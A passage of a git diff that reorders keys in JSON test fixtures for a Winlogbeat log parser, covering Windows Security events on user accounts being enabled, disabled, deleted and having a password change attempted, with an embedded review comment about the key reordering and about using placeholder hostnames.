Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was 
enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": 
"{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json index 34874fdfb..ac581308e 100644 --- a/Beats/winlogbeat/tests/security_event_4723.json +++ b/Beats/winlogbeat/tests/security_event_4723.json 
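Review bot: Nothing observable changes in this fixture: the `input` object keeps the same two keys and, as far as the two long strings can be compared here, a byte-identical `message` value, so the hunk is a key-order rewrite that no JSON consumer can distinguish from the old file; the same holds for the 4723, 4725 and 4726 fixtures below. If a key-sorting formatter produced it, saying so in the commit message would spare reviewers from hunting for a content change inside these lines; if it was done by hand, keeping the old order would confine the diff to the parser fix. A pre-existing detail worth fixing while these lines are touched: the synthetic hosts and addresses (`PC01.domain.com`, `1.2.3.4`) are not reserved documentation names, whereas `example.com` and an RFC 5737 address such as `192.0.2.10` make it unambiguous that fixture data never refers to real infrastructure.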
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional 
Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 
Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json index 31cca5f97..d3826be97 100644 --- a/Beats/winlogbeat/tests/security_event_4725.json +++ b/Beats/winlogbeat/tests/security_event_4725.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity 
ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account 
Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json index e147e2eb4..73c1d823c 100644 --- a/Beats/winlogbeat/tests/security_event_4726.json +++ b/Beats/winlogbeat/tests/security_event_4726.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account 